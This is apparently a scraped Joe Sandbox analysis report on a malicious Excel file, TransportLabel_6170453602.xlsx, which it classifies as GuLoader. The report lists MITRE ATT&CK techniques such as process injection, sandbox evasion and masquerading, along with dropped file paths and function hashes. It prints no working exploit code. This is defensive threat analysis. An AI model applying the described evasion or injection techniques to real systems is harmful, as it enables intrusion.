Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: d1bddae3a0f18f97ac1aa465d67762edc6f3aabfb23b395e61e0e19fb30ac715
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 50F0C231205414FFD7029FA5DE049AFBBA8EF06250B2140BAE840F7310DA78DE019BA8

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TransportLabel_6170453602.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Signatures

Memory Dumps

Sigma Signatures

Exploits

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1F3E17F6.jpeg

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48839F74.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F64A789.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\81B469ED.jpeg

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AAB93B7F.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AABEA29C.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B28B50E5.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D082CF0A.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D90BABA8.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ED1C7F83.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE386947.emf

C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll

C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll

C:\Users\user\AppData\Local\Temp\CoverDes.exe.manifest

Windows Analysis Report
TransportLabel_6170453602.xlsx

Function 03570435 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98
libraryCOMMON

Function 035703A9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 155
filenetworkCOMMON

Function 035703C5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146
filenetworkCOMMON

Function 0357044F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85
COMMON

Function 035704BA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
filenetworkCOMMON

Function 03570504 Relevance: 3.0, APIs: 2, Instructions: 48
COMMON

Function 0357051B Relevance: 3.0, APIs: 2, Instructions: 45
COMMON

Function 03570539 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 03570540 Relevance: .0, Instructions: 14
COMMON

Function 03570390 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 0040350A Relevance: 79.2, APIs: 33, Strings: 12, Instructions: 450
stringfilecomCOMMON

Function 004056BB Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON